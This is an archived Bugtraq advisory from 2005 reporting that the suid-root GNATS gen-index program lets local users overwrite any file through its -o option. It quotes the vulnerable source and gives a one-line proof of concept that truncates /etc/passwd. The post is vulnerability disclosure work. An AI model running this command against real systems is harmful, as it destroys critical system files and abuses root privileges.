GNATS - gen-index

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GNATS - gen-index
From: pi3ki31ny@xxxxx
Date: 6 Jul 2005 15:03:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Name:                       GNATS - gen-index
Vendor URL:                 http://www.gnu.org/software/gnats
Author:                     Adam Zabrocki <pi3ki31ny@xxxxx>
Date:                       June 16, 2005

    Issue:


  GNATS - the GNU problem report management system allows attacker to overwrite
files with privileges suid root (when compiled from sources and there isn't in 
system
gnats user), where GNATS is installed.


    Description:


  GNATS stores all information about the problem reports at a central site, and 
enables
users to access this site by various means, including e-mail, WWW, and a 
network daemon.
New problem reports can be created, and existing reports can be queried and 
updated, by
most of these means.


    Details:

        
        Possible overwrite any files in system by gen-index program installed
        with GNATS.


  Local users, able to run gen-index (in some times when GNATS was compiled 
from sources
and in system don't exist gnats user and group) are able to overwrite any files 
in system.
  The problem lies in gen-index main() function, which don't check argument who 
was given
to program and in hard open and write there own data.

"gnats/gen-index.c"
int
main (int argc, char **argv)
{
  ...
  ...

    while ((optc = getopt_long (argc, argv, "o:hd:nVie",
                              long_options, (int *) 0)) != EOF)
    {
      switch (optc)
        {
        ...
        ...
        case 'o':
          file_name = optarg;
          break;

        case 'n':
          numeric_sorting = TRUE;
          break;
        ...
        ...
        }
    }

  ...
  ...

  if (file_name)
    output = fopen (file_name, "w+");
  if (output == (FILE *) NULL)
    {
      fprintf (stderr, "%s: can't write to %s: %s\n", program_name,
               optarg, strerror (errno));
      exit (3);
    }

  ...
  ...

  if (indexIsBinary (database))
    {
      char numFields = indexFieldCount (database);
      fwrite (&numFields, 1, 1, output);
    }

  ...
  ...
  if (numeric_sorting && num_entries > 0)
    {
      qsort (entries, num_entries, sizeof (Entry), entry_cmp);
      for (i = 0; i < num_entries; i++)
        {
          fwrite (entries[i].string, 1, entries[i].length, output);
        }
    }

  fclose (output);
  ...
  exit (0);
}


Function fopen() with argument "w+" open file for reading and writing.
The file is created if it does not exist, otherwise it is truncated.
So when gen-index have suid root privilages we can overwrite any files
in system.


    Exploit:


  We don't need to write any 31337 exploit. Simple PoC:

pi3@darkstar:~$ pwd
/home/pi3
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r--    1 root     root          795 May 19 18:49 /etc/passwd
pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index
-r-sr-xr-x    1 root     root         465k Nov 21  2004 
/usr/local/libexec/gnats/gen-index*
pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n -o /etc/passwd
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r--    1 root     root            1 Jun 16 17:34 /etc/passwd
pi3@darkstar:~$ cat /etc/passwd
pi3@darkstar:~$


GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all previous versions 
are also vulnerable.

I have informed GNATS team.

--
pi3 (pi3ki31ny) - pi3ki31ny@xxxxx
http://www.pi3.int.pl

Prev by Date: [SECURITY] [DSA 740-1] New zlib packages fix denial of service
Next by Date: [SECURITY] [DSA 738-1] New razor packages fix potential DOS
Previous by thread: [SECURITY] [DSA 740-1] New zlib packages fix denial of service
Next by thread: [SECURITY] [DSA 738-1] New razor packages fix potential DOS
Index(es):
- Date
- Thread